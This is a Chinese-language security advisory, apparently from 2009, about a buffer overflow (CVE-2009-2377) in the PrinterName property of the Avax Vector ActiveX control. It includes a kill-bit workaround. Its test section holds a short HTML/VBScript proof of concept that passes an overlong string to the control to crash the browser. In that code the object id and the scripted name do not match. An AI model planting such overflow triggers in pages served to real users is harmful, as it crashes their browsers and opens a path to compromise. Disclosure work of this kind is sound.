发布日期：2009-07-06
更新日期：2009-07-09

受影响系统：

AVAX-software Avax Vector ActiveX 1.3

描述：

---

BUGTRAQ  ID: 35583
CVE(CAN) ID: CVE-2009-2377

Avax Vector ActiveX是用于查看、创建、编辑2D矢量绘图的工具。

Avax Vector ActiveX控件（avPreview.ocx）没有正确地验证用户所传送的PrinterName属性参数。如果用户受骗访问了恶意网页并传送了超长属性，就可能触发缓冲区溢出，导致浏览器崩溃。

<*来源：Satan_Hackers （Satan_hackers@yahoo.com）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<object classid='clsid:9589AEC9-1C2D-4428-B7E8-63B39D356F9C' id='CCRP' ></object>
<script language='vbscript'>

argCount = 1

arg1=String(10260, "A")

target.PrinterName = arg1

</script>

<script language='javascript'>
document.location.reload()
</script>

建议：

---

临时解决方法：

* 为clsid 9589AEC9-1C2D-4428-B7E8-63B39D356F9C设置kill bit。

厂商补丁：

AVAX-software
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.avax-software.com/products/avax-vector-activex

浏览次数：2676
严重程度：0（网友投票）